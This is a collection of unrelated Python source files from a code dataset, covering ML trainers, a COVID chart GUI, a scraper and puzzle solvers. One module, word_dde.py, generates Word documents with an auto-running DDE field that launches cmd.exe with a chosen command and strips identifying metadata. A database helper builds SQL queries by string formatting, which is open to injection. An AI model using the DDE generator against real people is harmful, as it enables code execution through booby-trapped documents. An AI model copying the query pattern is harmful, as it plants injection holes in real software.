if sensor_type in pv_config:\n sens = await sensor.new_sensor(pv_config[sensor_type])\n cg.add(getattr(var, f\"set_{sensor_type}_sensor_pv\")(i, sens))\n","sub_path":"sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"253565841","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport util\nimport constants as C\n\nclass car:\n def __init__(self, pos = None, dir = None):\n if pos:\n self.position = util.coordinate(pos)\n else:\n self.position = C.DEFAULT_POSITION\n\n if dir:\n self.direction = dir \n else:\n self.direction = C.DEFAULT_DIRECTION \n\n self.touching = None\n\n def move(squares = 1):\n self.position += C.DIRECTION_POSITION_MAP(self.direction) * squares\n \n\n def __repr__(self):\n return \"Pos: \" + str(self.position) + \" Dir:\" + str(self.direction)\n","sub_path":"algo-data-structures/maze/lib/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352733239","text":"from collections import namedtuple\nimport tensorflow as tf\nfrom tensorflow.python.util import nest\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.lib.io import file_io\nfrom tensorflow.python.framework.errors import ResourceExhaustedError\n\nimport multiprocessing\nimport utils as libutils\nimport model_config\nimport model_analysis\nimport data_config\nimport batch_allreduce\nimport logging\nimport numpy as np\nimport time\nimport os\nimport random\nimport re\nimport myelindl\nimport math\n\n# from HPOlib.myHPO import SmacWrapper\n\nfrom benchmark_cnn import BenchmarkCNN\n\nflags = tf.app.flags\nFLAGS = tf.app.flags.FLAGS\nlogging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO)\n\nflags.DEFINE_integer('num_gpus', 1, 'the number of GPUs to run on')\nflags.DEFINE_enum('device', 'gpu', ('cpu', 'gpu'),\n 'Device to use for computation: cpu or gpu')\nflags.DEFINE_enum('data_format', 'NCHW', ('NHWC', 'NCHW'),\n 'Data layout to use: NHWC (TF native) or NCHW (cuDNN '\n 'native, requires GPU).')\n# the ps server uses the device cpu without set local_parameter_device_flag = 'gpu'\n# ref: https://github.com/tensorflow/benchmarks/blob/master/scripts/tf_cnn_benchmarks/variable_mgr.py#L183-L225\nflags.DEFINE_enum('variable_update', 'replicated',\n ('parameter_server', 'replicated', 'cpu_recomputing'),\n 'The method for managing variables: parameter_server, '\n 'replicated')\n# memory saving method, some method need to adjust the variable_update method, \n# ex: recomputing <-> cpu_recomputing\nflags.DEFINE_string('memory_saving_method', None,\n 'setup the memory saving method, 1. recomputing 2. TBD ')\nflags.DEFINE_integer('summary_verbosity', 0, 'Verbosity level for summary ops. '\n 'level 0: disable any summary.\\n'\n 'level 1: small and fast ops, e.g.: learning_rate, '\n 'total_loss.\\n'\n 'level 2: medium-cost ops, e.g. histogram of all '\n 'gradients.\\n'\n 'level 3: expensive ops: images and histogram of each '\n 'gradient.\\n')\nflags.DEFINE_string('train_dir', None,\n 'Path to session checkpoints. Pass None to disable saving '\n 'checkpoint at the end.')\nflags.DEFINE_string('networkDirectory', None,\n 'The directory where placed model file')\nflags.DEFINE_string('network', 'network.py',\n 'The network file name')\nflags.DEFINE_string('save', None,\n 'Path to session checkpoints. Pass None to disable saving '\n 'checkpoint at the end.')\nflags.DEFINE_string('train_db', None,\n 'Path to train dataset in TFRecord format.')\nflags.DEFINE_string('validation_db', None,\n 'Path to validation dataset in TFRecord format.')\nflags.DEFINE_string('labels_list', None,\n 'list of labels file ')\nflags.DEFINE_string('visualizeModelPath', None,\n 'Constructs the current model for visualization.')\nflags.DEFINE_integer('save_summaries_steps', 100,\n 'How often to save summaries for trained models. Pass 0 '\n 'to disable summaries.')\nflags.DEFINE_integer('display_every', 10,\n 'Number of local steps after which progress is printed '\n 'out')\n# tf Option\nflags.DEFINE_integer('num_intra_threads', 1,\n 'Number of threads to use for intra-op parallelism. If '\n 'set to 0, the system will pick an appropriate number.')\nflags.DEFINE_integer('num_inter_threads', 0,\n 'Number of threads to use for inter-op parallelism. If '\n 'set to 0, the system will pick an appropriate number.')\nflags.DEFINE_boolean('force_gpu_compatible', False,\n 'whether to enable force_gpu_compatible in GPU_Options')\nflags.DEFINE_boolean('allow_growth', False,\n 'whether to enable allow_growth in GPU_Options')\nflags.DEFINE_float('gpu_memory_frac_for_testing', 0,\n 'If non-zero, the fraction of GPU memory that will be used. '\n 'Useful for testing the benchmark script, as this allows '\n 'distributed mode to be run on a single machine. For '\n 'example, if there are two tasks, each can be allocated '\n '~40 percent of the memory on a single machine',\n lower_bound=0., upper_bound=1.)\nflags.DEFINE_boolean('xla', False, 'whether to enable XLA')\nflags.DEFINE_boolean('enable_layout_optimizer', False,\n 'whether to enable layout optimizer')\n# hparams\nflags.DEFINE_enum('optimizer', 'sgd', ('momentum', 'sgd', 'rmsprop'),\n 'Optimizer to use: momentum or sgd or rmsprop')\nflags.DEFINE_string('piecewise_learning_rate_schedule', '0.1;1;0.1',\n 'Specifies a piecewise learning rate schedule based on the '\n 'number of epochs. This is the form LR0;E1;LR1;...;En;LRn, '\n 'where each LRi is a learning rate and each Ei is an epoch '\n 'indexed from 0. The learning rate is LRi if the '\n 'E(i-1) <= current_epoch < Ei. For example, if this '\n 'paramater is 0.3;10;0.2;25;0.1, the learning rate is 0.3 '\n 'for the first 10 epochs, then is 0.2 for the next 15 '\n 'epochs, then is 0.1 until training ends.')\nflags.DEFINE_float('weight_decay', 0.00004,\n 'Weight decay factor for training.')\nflags.DEFINE_float('epoch', 1.,\n 'number of epochs to run, excluding warmup. '\n 'This and --num_batches cannot both be specified.')\nflags.DEFINE_integer('batch_size', 0, 'batch size per compute device')\nflags.DEFINE_float('num_learning_rate_warmup_epochs', 0,\n 'Slowly increase to the initial learning rate in the first '\n 'num_learning_rate_warmup_epochs linearly.')\n# flags.DEFINE_float('warmup_init_lr', 0.1, 'initial lr of warmup')\nflags.DEFINE_boolean('eval', False, 'whether use eval or benchmarking')\nflags.DEFINE_integer('small_chunk', 1, 'number of times to accumulate gradents')\n# data aug\nflags.DEFINE_boolean('aug_flip', True, 'whether randomly flip left or right dataset')\nflags.DEFINE_boolean('color_augmentation', True, 'whether randomly color augmentation dataset')\nflags.DEFINE_integer('resize_pad', 0, 'image size for random resize and pad image')\nflags.DEFINE_enum('resize_method', 'round_robin',\n ('round_robin', 'nearest', 'bilinear', 'bicubic', 'area'),\n 'Dataset resize method.')\nflags.DEFINE_float('init_learning_rate', None, 'initial learning rate for exponential decay')\nflags.DEFINE_float('learning_rate_decay_factor', None, 'gamma for exponential decay')\nflags.DEFINE_integer('learning_rate_exp_step', 50, 'steps for exponential decay')\nflags.DEFINE_enum('lr_policy', 'multistep', ('multistep', 'exp'),\n 'Type of learning rate policy')\nflags.DEFINE_boolean('test_max_batch_size', False, 'If this flag trun on (TRUE), we just test '\n 'the max batch size, and ignore almost other fields')\nflags.DEFINE_integer('start_batch_size', 32, 'When we test max_batch size from start_batch_size')\n\nflags.DEFINE_integer('stop_accu_epoch', 0, 'early stop when accuracy does not increase 1% for'\n 'numbers of epochs')\n\ndef tensorflow_version_tuple():\n v = tf.__version__\n major, minor, patch = v.split('.')\n return (int(major), int(minor), patch)\n\n\ndef test_max_batch_size(num_gpu=1, start_size=512, limit=None):\n min = num_gpu\n if num_gpu > start_size:\n logging.error(\"start_size must bigger then num_gpu, current start_size {}\".format(start_size))\n return 0\n\n size = batch_size_regulation(num_gpu, start_size)\n while size != min:\n logging.info(\"Test Batch Size {}, s:{}, b:{}, l:{}.\".format(size, size, min, limit))\n if test_batch_size(size):\n if limit:\n # found max\n break\n min = size\n size = batch_size_regulation(num_gpu, (size * 2) if not limit else size + (limit - size) // 2)\n else:\n if min > num_gpu:\n # found max\n size = min\n break\n limit = size\n size = batch_size_regulation(num_gpu, min + (size - min) // 2)\n logging.info(\"Max Batch Size found {}.\".format(size))\n return size\n\n\ndef batch_size_regulation(num_gpu, size):\n if num_gpu <= 1:\n return size\n return (size // num_gpu) * num_gpu\n\n\ndef test_batch_size(size):\n # test with batch size\n pass_test = False\n model = None\n try:\n with tf.Graph().as_default():\n FLAGS.batch_size = size\n FLAGS.num_gpus = 1\n model = BenchmarkCNN(FLAGS)\n model.setup()\n model.print_info()\n\n # override batch test parameters\n model.num_epochs = 1\n model.train_batches = 3\n\n model.run()\n pass_test = True\n # except ResourceExhaustedError:\n # logging.info(\"Resource Exhausted when test Batch Size {}\".format(size))\n # logging.exception(\"Resource Exhausted when test Batch Size {}\".format(size))\n except:\n # logging.error(\"Error Happened when test Batch Size {}\".format(size))\n # raise\n logging.info(\"Resource Exhausted when test Batch Size {}\".format(size))\n finally:\n if model:\n del model\n tf.reset_default_graph()\n\n return pass_test\n\n\ndef main(_):\n if FLAGS.test_max_batch_size:\n FLAGS.hpo = None\n test_max_batch_size(FLAGS.num_gpus, FLAGS.start_batch_size)\n return\n\n bench = BenchmarkCNN(FLAGS)\n bench.setup()\n tfversion = tensorflow_version_tuple()\n logging.info('TensorFlow: %i.%i' % (tfversion[0], tfversion[1]))\n\n bench.print_info()\n acc = bench.run()\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"myelindl/tools/tf/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":10486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409723294","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# Only enabled on windows\nimport sys\nfrom common.utils import MSTypes\nif sys.platform == \"win32\":\n # Download and install pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/\n import win32com.client # @UnresolvedImport\n\nimport logging\nfrom modules.word_gen import WordGenerator\n\n\nclass WordDDE(WordGenerator):\n \"\"\" \n Module used to generate MS Word file with DDE object attack\n Inspired by: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/\n \"\"\"\n \n \n def run(self):\n logging.info(\" [+] Generating MS Word with DDE document...\")\n \n # Read command file\n commandFile =self.getCMDFile() \n if commandFile == \"\":\n logging.error(\" [!] Could not find cmd input!\")\n return\n\n logging.info(\" [-] Open document...\")\n # open up an instance of Word with the win32com driver\n word = win32com.client.Dispatch(\"Word.Application\")\n # do the operation in background without actually opening Excel\n word.Visible = False\n document = word.Documents.Open(self.outputFilePath)\n\n logging.info(\" [-] Inject DDE field (Answer 'No' to popup)...\")\n with open (commandFile, \"r\") as f:\n command=f.read()\n \n ddeCmd = r'\"\\\"c:\\\\Program Files\\\\Microsoft Office\\\\MSWORD\\\\..\\\\..\\\\..\\\\windows\\\\system32\\\\cmd.exe\\\" /c %s\" \".\"' % command.rstrip()\n wdFieldDDEAuto=46\n document.Fields.Add(Range=word.Selection.Range,Type=wdFieldDDEAuto, Text=ddeCmd, PreserveFormatting=False)\n \n # save the document and close\n word.DisplayAlerts=False\n # Remove Informations\n logging.info(\" [-] Remove hidden data and personal info...\")\n wdRDIAll=99\n document.RemoveDocumentInformation(wdRDIAll)\n logging.info(\" [-] Save Document...\")\n document.Save()\n document.Close()\n word.Application.Quit()\n # garbage collection\n del word\n \n logging.info(\" [-] Generated %s file path: %s\" % (self.outputFileType, self.outputFilePath))\n \n \n ","sub_path":"src/modules/word_dde.py","file_name":"word_dde.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"572408037","text":"from tkinter import *\nimport covid\nfrom matplotlib import pyplot as plt\nfrom covid import Covid\nfrom PIL import ImageTk, Image\n#import patches to scale the data\nimport matplotlib.patches as mpatches\n\n\n#initializing covid library\ncovid = Covid()\n\npathoftheimage = 'C:/Users/kurtk/OneDrive/Desktop/DontOpen/Python/Projects/Covid19Update/covback.jpg'\n\n#initializing tkinter\nwindow = Tk()\nwindow.geometry(\"350x470\")\nwindow.config(bg=\"#416C7B\")\nwindow.title(\"Covid-19 Update Based on Countries\")\nicon = PhotoImage(file='C:/Users/kurtk/OneDrive/Desktop/DontOpen/Python/Projects/Covid19Update/image.png')\nwindow.iconphoto(True,icon)\n\nimg = ImageTk.PhotoImage(Image.open(pathoftheimage))\npanel = Label(window, image=img)\npanel.pack()\n\n#get covid data and display it\ndef getCovidData():\n cases = []\n confirmed = []\n active = []\n deaths = []\n recovered = []\n\n\n #using try and except to run program without errors\n try:\n #updating window\n window.update()\n #getting countries names entered by the user\n countries = data.get()\n #removing white spaces from the start and the end of the string\n country_names = countries.strip()\n #replacing white spaces with commas inside the string\n country_names = country_names.replace(\" \", \",\")\n #spliting the string to store names of countries as a list\n country_names = country_names.split(\",\")\n\n #for loop to get all countries data\n for i in country_names:\n # appending countries data one by one\n cases.append(covid.get_status_by_country_name(i))\n #updating the window\n window.update()\n\n #getting country data stored as a dictionary in the list cases\n for x in cases:\n #storing data\n confirmed.append(x[\"confirmed\"])\n active.append(x[\"active\"])\n deaths.append(x[\"deaths\"])\n recovered.append(x[\"recovered\"])\n\n #making the color information on scaleusing patches\n confirmed_patch = mpatches.Patch(color='green', label='confirmed')\n recovered_patch = mpatches.Patch(color='red', label='recovered')\n active_patch = mpatches.Patch(color='blue', label='active')\n deaths_patch = mpatches.Patch(color='black', label='deaths')\n\n #ploting the scale on graph using legend()\n plt.legend(handles=[confirmed_patch, recovered_patch, active_patch, deaths_patch])\n\n #showing the data using graphs\n for i in range(len(country_names)):\n plt.bar(country_names[i], confirmed[i], color='green')\n if recovered[i] > active[i]:\n plt.bar(country_names[i], recovered[i], color='red')\n plt.bar(country_names[i], active[i], color='blue')\n else:\n plt.bar(country_names[i], active[i], color='blue')\n plt.bar(country_names[i], recovered[i], color='red')\n plt.bar(country_names[i], deaths[i], color='black')\n\n #the graph\n plt.title('Current Covid Cases')\n plt.xlabel('Contry Name')\n plt.ylabel('Cases(in millions)')\n plt.show()\n except Exception as e:\n #this will run when the user enters incorrect details\n data.set(\"Invalid entry! Please enter correct details\")\n\nLabel(window, text=\"Enter all countries names\\nfor whom you want to get\\ncovid-19 data\", font=('Comic Sans MS', 15, \"bold\" ),fg=\"white\", bg=\"#416C7B\").pack()\nspace = Label(window,text=\"\",font=('Comic Sans MS', 15, \"bold\" ),bg=\"#416C7B\").pack()\n\nLabel(window, text=\"Seperate country names using comma or space(not both)\", font=('Comic Sans MS',9, \"bold\"), fg=\"white\", bg=\"#416C7B\").pack()\nLabel(window, text=\"Enter country name:\",font=('Comic Sans MS',8, \"bold\"),fg=\"white\", bg=\"#416C7B\").pack()\n\ndata = StringVar()\ndata.set(\"\")\n\nentryField = Entry(window, textvariable=data, width=50).pack()\nButton(window, text=\"Get Data\", cursor=\"hand2\",bg=\"blue\", fg=\"white\", command=getCovidData).pack()\n\nspace = Label(window,text=\"\",font=('Comic Sans MS', 15, \"bold\" ),bg=\"#416C7B\").pack()\n\ndevName = Label(window,text=\"Copyright © 2021 Edem\", fg=\"white\",bg=\"#416C7B\", font=(\"Comic Sans MS\",10,\"bold\")).pack()\n \n\nwindow.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"99466003","text":"#!/usr/bin/env python3\n#Winter Term Project Version1\n\nclass Creator2():\n def __init__(self,day,month,year,name):\n self.day=day\n self.month=month\n self.year=year\n self.name=name\n def getFirstName(self):\n space=self.name.index(\" \")\n firstName=self.name[0:space]\n return firstName\n def getLastName(self):\n space=self.name.index(\" \")\n lastName=self.name[space+1:]\n return lastName\n def getDay(self):\n return self.day\n def getMonth(self):\n return self.month\n def getYear(self):\n return self.year\n def countSet(self,name):\n alpha=\"0ABCDEFGHIJKLMNOPQRSTUVWXYZ0abcdefghijklmnopqrstuvwxyz\"\n count=alpha.index(name[0:1])\n return count%27\n def birthTotal(self):\n if self.year<10:\n return self.month+((self.day//10)+(self.day%10))+self.year\n else:\n return self.month+((self.day//10)+(self.day%10))+(self.year/10)\n def decimal(self):\n deci=0.00\n first=self.getFirstName()\n a=self.countSet(first)\n c=a\n deci+=c\n last=self.getLastName()\n b=self.countSet(last)\n d=(float)(b*.1)\n deci+=d;\n return deci; \n def FinalNum(self):\n FinNum=self.birthTotal()*self.decimal();\n if (FinNum>809.0):\n return round(FinNum%809);\n return round(FinNum);\n def isShiny(self): \n x=len(self.name)-1\n if(x%10==0):\n x=x//10\n u=self.FinalNum()//10\n d=u%10\n return x==u%10\n o=self.FinalNum()%10\n return x==self.FinalNum()%10\n def shinyConfirm(self):\n if (self.isShiny()==True):\n return \"This pokemon is Shiny!\"\n return \"\"\n def region(self):\n if (self.FinalNum()<=151):\n return \"Kanto Region\"\n elif(self.FinalNum()>=152 and self.FinalNum()<=251):\n return \"Johto Region\"\n elif(self.FinalNum()>=252 and self.FinalNum()<=386):\n return \"Hoenn Region\"\n elif(self.FinalNum()>=387 and self.FinalNum()<=493):\n return \"Sinnoh Region\"\n elif(self.FinalNum()>=494 and self.FinalNum()<=649):\n return \"Unova Region\"\n elif(self.FinalNum()>=650 and self.FinalNum()<=721):\n return \"Kalos Region\"\n elif(self.FinalNum()>=722 and self.FinalNum()<=809):\n return \"Alola Region\"\n return \"???\"\n","sub_path":"creator2.py","file_name":"creator2.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118557481","text":"import os\n\nimport numpy as np\nimport torch\nfrom torch import optim\nfrom tqdm import tqdm\nimport segmentation_models_pytorch as smp\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom lib import data\nfrom lib import models\n\nclass Trainer:\n '''\n Trainer for PyTorch models\n\n Arguements:\n model (toch.Module) -- Torch model\n checkpoint_path (str) -- Path to save checkpoints\n data_train(valid/test) -- Path to data directory\n masks_train(vaid/test) -- Path to masks\n preprocessing -- Preprocessing function\n augmentations -- Augmentation function\n optimizer -- Custom optimizer for model\n\n Methods:\n fit(epo, batch_size, verbose) -- training function\n get_test_score() -- get score on test data if avalible \n '''\n def __init__(self, model, checkpoint_path, \n data_train, masks_train,\n data_valid, masks_valid,\n preprocessing=None,\n augmentations=None,\n optimizer=None, device=\"cpu\",\n data_test=None, masks_test=None,\n ):\n self.model = model\n self.checkpoint_path = checkpoint_path\n self.optimizer = optimizer\n self.device = device\n\n self.train = data.Dataset(data_train, masks_train,\n preprocessing=preprocessing,\n augmentation=augmentations)\n self.valid = data.Dataset(data_valid, masks_valid)\n if data_test:\n self.test = data.Dataset(data_test, masks_test)\n else: self.test=None\n \n def fit(self, epo, batch_size, verbose=0):\n '''\n Fit model\n\n Arguements:\n epo (integer) -- Numbers of epochs\n batch_size (integer) -- Number of images in training data batch\n verbose (integer) -- 0 for no output\n 1 for only epo output\n 2 for full output\n '''\n # defime metrics\n criterion = smp.utils.losses.BCEDiceLoss()\n metrics = [\n smp.utils.metrics.IoUMetric(),\n smp.utils.metrics.FscoreMetric()\n ]\n \n # configure data loaders\n train_loader = DataLoader(self.train, batch_size=batch_size, \n shuffle=True, num_workers=0)\n val_loader = DataLoader(self.valid, batch_size=1, \n shuffle=False, num_workers=0)\n \n # configure default optimizer\n if self.optimizer is None:\n self.optimizer = optim.Adam(self.model.parameters(), lr=1e-4)\n \n # configure training process\n train_epoch = smp.utils.train.TrainEpoch(\n self.model, \n loss=criterion, \n metrics=metrics, \n optimizer=self.optimizer,\n device=self.device,\n verbose=True if verbose==2 else False,\n )\n val_epoch = smp.utils.train.ValidEpoch(\n self.model, \n loss=criterion, \n metrics=metrics, \n device=self.device,\n verbose=True if verbose==2 else False,\n )\n\n # training loop\n logs = []\n max_score = 0\n iterator = range(epo) if verbose!=1 else tqdm(range(epo))\n for i in iterator:\n if verbose==2:\n print(f'\\nEpoch: {i}')\n\n train_logs = train_epoch.run(train_loader)\n valid_logs = val_epoch.run(val_loader)\n \n logs.append((train_logs, valid_logs))\n\n # save best model\n if max_score < valid_logs['iou']:\n max_score = valid_logs['iou']\n torch.save(self.model, self.checkpoint_path)\n if verbose==2:\n print('Model saved!')\n print(f\"Training completed sucessfully.\\nBest model IoU: {max_score}\")\n return max_score, logs\n\n def get_test_score(self):\n '''\n Calculate test score\n '''\n if self.test is None:\n raise ValueError(\"No test data provided\")\n # defime metrics\n criterion = smp.utils.losses.BCEDiceLoss()\n metrics = [\n smp.utils.metrics.IoUMetric(),\n smp.utils.metrics.FscoreMetric()\n ]\n # configure data loader\n val_loader = DataLoader(self.test, batch_size=1, \n shuffle=False, num_workers=0)\n # perform testing\n val_epoch = smp.utils.train.ValidEpoch(\n self.model, \n loss=criterion, \n metrics=metrics, \n device=self.device,\n verbose=True\n )\n score = val_epoch.run(val_loader)\n return score\n","sub_path":"human_segmentation/lib/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330157212","text":"\"\"\"\nThe string \"PAYPALISHIRING\" is written in a zigzag pattern on a given number of rows like this: (you may want to display this pattern in a fixed font for better legibility)\n\nP A H N\nA P L S I I G\nY I R\nAnd then read line by line: \"PAHNAPLSIIGYIR\"\n\nWrite the code that will take a string and make this conversion given a number of rows:\n\nstring convert(string s, int numRows);\nExample 1:\n\nInput: s = \"PAYPALISHIRING\", numRows = 3\nOutput: \"PAHNAPLSIIGYIR\"\nExample 2:\n\nInput: s = \"PAYPALISHIRING\", numRows = 4\nOutput: \"PINALSIGYAHRPI\"\nExplanation:\n\nP I N\nA L S I G\nY A H R\nP I\n\"\"\"\n\nclass Solution:\n def convert(self, s, numRows):\n if s == \"\":\n return s\n if numRows == 1:\n return s\n if numRows >= len(s):\n return s\n step = 1\n pos = 1\n lines = {}\n for c in s:\n if pos not in lines:\n lines[pos] = c\n else:\n lines[pos] += c\n pos += step\n if pos == 1 or pos == numRows:\n step *= -1\n\n result = \"\"\n for i in range(1, numRows + 1):\n try:\n result += lines[i]\n except:\n return result\n return result\n\ndef main():\n testcases=[]\n testcases.append((\"\", 1))\n testcases.append((\"A\", 3))\n testcases.append((\"AB\", 1))\n testcases.append((\"PAYPALISHIRING\", 3))\n testcases.append((\"PAYPALISHIRING\", 4))\n sol = Solution()\n for case in testcases:\n s, numRows = case\n print(\"s:{} numRows:{}\".format(s, numRows))\n ans = sol.convert(s, numRows)\n print('s:{} result:{}'.format(s, ans))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"DSA_CodingChallenge/python/Leetcode_ZigZagConversion_02.py","file_name":"Leetcode_ZigZagConversion_02.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"268835360","text":"# -*- coding: utf-8 -*-\n\"\"\"需要携带UA\"\"\"\n\"\"\"\n爬取西班牙和德国十年期国债率差对应的数据\n\"\"\"\nimport scrapy\nimport logging\nfrom indexhq.items import IndexhqCrawlItem\nfrom indexhq.common.global_data import GlobalData\n\nclass Index25InvestingSpider(scrapy.Spider):\n name = 'index25_investing'\n allowed_domains = ['cn.investing.com']\n start_urls = ['https://cn.investing.com/rates-bonds/government-bond-spreads']\n # 产品提供页面地址:http://www.stockq.org/index/VIX.php\n\n data = GlobalData()\n\n ita_atrade_xpath = '//*[@id=\"pair_23806\"]/td[3]/text()'\n ger_atrade_xpath = '//*[@id=\"pair_23693\"]/td[3]/text()'\n time_xpath = '//*[@id=\"pair_23738\"]/td[10]/text()'\n\n def parse(self, response):\n SCode = 'index25'\n item = IndexhqCrawlItem()\n\n spa_atrade = response.xpath(self.ita_atrade_xpath).extract_first().replace(',', '')\n ger_atrade = response.xpath(self.ger_atrade_xpath).extract_first().replace(',', '')\n atrade = float(spa_atrade) - float(ger_atrade)\n yclose = self.data.opindex25 if isinstance(self.data.opindex25, float) else atrade\n # hqTTime = response.xpath(self.time_xpath).extract_first()\n # u'09:11:02'\n # marketTime = ''\n # indexdate = response.xpath(self.indexdate_xpath).extract_first()\n Weight = self.data.opweight[SCode]\n CTime = self.data.optime\n logging.warning(\"{}, SCode={}, atrade={}, yclose={}\".format(self.__class__.__name__, SCode, atrade, yclose))\n\n item['SCode'] = SCode\n item['ATrade'] = round(float(atrade), 4)\n item['YClose'] = round(float(yclose), 4)\n item['Weight'] = Weight\n item['CTime'] = CTime\n yield item","sub_path":"indexhq/spiders/index25_investing.py","file_name":"index25_investing.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605560208","text":"import pymysql\n\n\nconnect = pymysql.Connect(host='localhost', user='root', password='', db='kinopoisk')\ncursor = connect.cursor()\n\n\ndef check_film(kino_id):\n cursor.execute(f'SELECT * FROM movies WHERE kinopoisk_id = {str(kino_id)}')\n return len(cursor.fetchall())\n\n\ndef insert_categories(categories, id_of_movies):\n \"\"\"\n Добавление категорий в БД, тех которых не хватает, и сразу связывание их с фильмом.\n :param categories: категории\n :param id_of_movies: айди добавленного фильма\n :return:\n \"\"\"\n if len(categories) > 20:\n return\n cursor.execute('INSERT IGNORE INTO categories (title_of_category) VALUES (\"' + '\"), (\"'.join(categories) + '\")')\n\n connect.commit()\n\n cursor.execute('SELECT id '\n 'FROM categories '\n 'WHERE title_of_category IN (\"' + '\", \"'.join(categories) + '\")')\n ids_of_categories = tuple(str(id_of_movies) + ', ' + str(row[0]) for row in cursor.fetchall())\n cursor.execute('INSERT INTO mov_with_cat (id_of_mov, id_of_cat) VALUES (' + '), ('.join(ids_of_categories) + ')')\n connect.commit()\n\n\ndef insert_year(year):\n cursor.execute(f'INSERT IGNORE INTO years (title_of_year) VALUES ({year})')\n connect.commit()\n\n cursor.execute('SELECT id '\n 'FROM years '\n f'WHERE title_of_year = {year}')\n return cursor.fetchall()[0][0]\n\n\ndef insert_directors(directors, id_of_movies):\n \"\"\"\n Добавление категорий в БД, тех которых не хватает, и сразу связывание их с фильмом.\n :param directors: режисеры\n :param id_of_movies: айди добавленного фильма\n :return:\n \"\"\"\n cursor.execute('INSERT IGNORE INTO directors (title_of_director) VALUES (\"' + '\"), (\"'.join(directors) + '\")')\n connect.commit()\n\n cursor.execute('SELECT id '\n 'FROM directors '\n 'WHERE title_of_director IN (\"' + '\", \"'.join(directors) + '\")')\n ids_of_directors = tuple(str(id_of_movies) + ', ' + str(row[0]) for row in cursor.fetchall())\n cursor.execute('INSERT INTO mov_with_dir (id_of_mov, id_of_dir) VALUES (' + '), ('.join(ids_of_directors) + ')')\n connect.commit()\n\n\ndef insert_new_movie(data):\n \"\"\"\n Добавление фильма\n :param data: инфа о фильма\n :return:\n \"\"\"\n id_of_year = insert_year(data[3])\n\n cursor.execute('INSERT INTO movies (movie_name, `description`, id_of_year, rating, slug, poster, movie_or_serial, kinopoisk_id) '\n 'VALUES ( \"{}\", \"{}\", {}, \"{}\", \"{}\", \"{}\", \"{}\", {})'.format(data[0], data[1].replace('\"', \"'\"), str(id_of_year), data[4], data[6], data[7], str(data[8]), data[9][data[9].find('/') + 1:]))\n connect.commit()\n\n cursor.execute('SELECT MAX(id) FROM movies')\n id_of_movie = cursor.fetchall()[0][0]\n insert_categories(data[2], id_of_movie)\n insert_directors(data[5], id_of_movie)\n\n\ndef get_large_year():\n cursor.execute('SELECT kinopoisk_id FROM `movies` WHERE id_of_year IN (SELECT id FROM years WHERE title_of_year > \"2020\" OR title_of_year < \"1900\")')\n return tuple('film/' + str(row[0]) for row in cursor.fetchall())\n\n\ndef update_years(kinopoisk_id, year):\n cursor.execute(f'UPDATE movies SET id_of_year = (SELECT id FROM years WHERE title_of_year = \"{year}\") WHERE kinopoisk_id = {kinopoisk_id}')\n connect.commit()\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423269633","text":"import math\n\ndef find_divider(n):\n if n % 2 == 0 and n > 2:\n return 2\n for i in range(3, int(math.sqrt(n)) + 1, 2):\n if n % i == 0:\n return i\n return -1\n\ndef to_int_with_base(string, base):\n ret = 0\n for i in range(len(string)):\n if string[i] == \"1\":\n ret += base ** (len(string)-1-i)\n return ret\n\ndef gen_string(index, length):\n format_rule = \"0\" + str(length-2) + \"b\"\n return \"1\" + format(index, format_rule) + \"1\"\n\nfin = open(\"small.in\", 'r')\nfout = open(\"small.out\", 'w')\n\nt = int(fin.readline())\n\nfor cases in range(1, t+1):\n raw_in = fin.readline().split()\n jamcoin_length, jamcoin_count = int(raw_in[0]), int(raw_in[1])\n fout.write(\"Case #%d:\\n\" % cases)\n\n jamcoins = 0\n for i in range(2**(jamcoin_length-2)):\n if jamcoins >= jamcoin_count:\n break\n candidate = gen_string(i, jamcoin_length)\n dividers = []\n for j in range(2, 11):\n divider = find_divider(to_int_with_base(candidate, j))\n if divider == -1:\n break\n dividers.append(divider)\n if len(dividers) == 9:\n # Candidate is jamcoin!\n jamcoins += 1\n fout.write(\"%s %s\\n\" % (candidate, ' '.join(map(str, dividers))))\n\nfin.close()\nfout.close()\n","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_hama_1.py","file_name":"16_0_3_hama_1.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115010166","text":"from flask_appbuilder import ModelView\nfrom flask_appbuilder.models.sqla.interface import SQLAInterface\nfrom app import appbuilder\nfrom flask_appbuilder import ModelView,BaseView,expose, action, has_access\n\nfrom app import db\nimport random\nimport 